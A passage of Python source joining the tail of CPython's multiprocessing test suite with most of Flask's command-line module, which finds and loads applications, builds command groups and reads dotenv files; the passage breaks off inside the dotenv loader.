r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
cli.py
import ast
import inspect
import os
import platform
import re
import sys
import traceback
import warnings
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None # type: ignore
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
)
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
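# Illustrative note (added commentary, not part of Flask's docstring): with
# "FLASK_APP=hello" this resolution order means a module-level "app" or
# "application" object wins, then a single Flask instance found anywhere in
# the module, and only then a "create_app"/"make_app" factory called with
# no arguments.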
def call_factory(script_info, app_factory, args=None, kwargs=None):
"""Takes an app factory, a ``script_info`` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
sig = inspect.signature(app_factory)
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
if "script_info" in sig.parameters:
warnings.warn(
"The 'script_info' argument is deprecated and will not be"
" passed to the app factory function in Flask 2.1.",
DeprecationWarning,
)
kwargs["script_info"] = script_info
if (
not args
and len(sig.parameters) == 1
and next(iter(sig.parameters.values())).default is inspect.Parameter.empty
):
warnings.warn(
"Script info is deprecated and will not be passed as the"
" single argument to the app factory function in Flask"
" 2.1.",
DeprecationWarning,
)
args.append(script_info)
return app_factory(*args, **kwargs)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
if isinstance(expr, ast.Name):
name = expr.id
args = kwargs = None
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
)
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
)
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = call_factory(script_info, attr, args, kwargs)
except TypeError:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
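# Illustrative note: a value such as "FLASK_APP=hello:create_app('dev')" ends
# up here; the call is parsed with ast, so only literal arguments (strings,
# numbers, and the like) can be passed to the factory from the environment
# variable.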
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
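# Illustrative note (hypothetical layout, not taken from the Flask docs): for
# a package "pkg/app/__init__.py" and the argument "pkg/app/views.py", this
# walks up past every directory containing an __init__.py, inserts the
# directory that holds "pkg" into sys.path, and returns "pkg.app.views".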
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was"
f" raised:\n\n{traceback.format_exc()}"
)
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.")
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens,
it is recorded and shown as part of the WSGI handling, which in the
case of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
raise exc_info[1].with_traceback(exc_info[2])
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
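# Behavioural note (added commentary): when the app is loaded lazily in a
# background thread, the first request re-raises any import error recorded
# there and otherwise blocks on the lock until loading has finished, so the
# error surfaces through the WSGI response (e.g. the Werkzeug debugger)
# instead of killing the reloader process.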
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as a click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app being
returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
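# Note: the lookahead in the split above keeps ":" followed by a path
# separator intact, so a Windows path like "C:\\app.py" is not treated as
# a "module:attribute" reference.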
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
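# Illustrative usage (hypothetical command, not part of this module):
#
#     @click.command()
#     @with_appcontext
#     def seed_db():
#         ...  # current_app and the application context are available here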
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. See :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
return info.load_app().cli.get_command(ctx, name)
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
def list_commands(self, ctx):
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
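# A minimal sketch of the "advanced" use case the FlaskGroup docstring refers
# to: wiring a standalone management script to an application factory. The
# ``myapp`` package and its ``create_app`` factory below are hypothetical.
#
#     import click
#     from flask.cli import FlaskGroup
#     from myapp import create_app
#
#     @click.group(cls=FlaskGroup, create_app=create_app)
#     def cli():
#         """Management script for myapp."""
#
#     if __name__ == "__main__":
#         cli()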
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionchanged:: 2.0
When loading the env files, set the default encoding to UTF-8.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if a path was given, load that file if it exists, otherwise return False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path, encoding="utf-8")
return False
new_dir = None
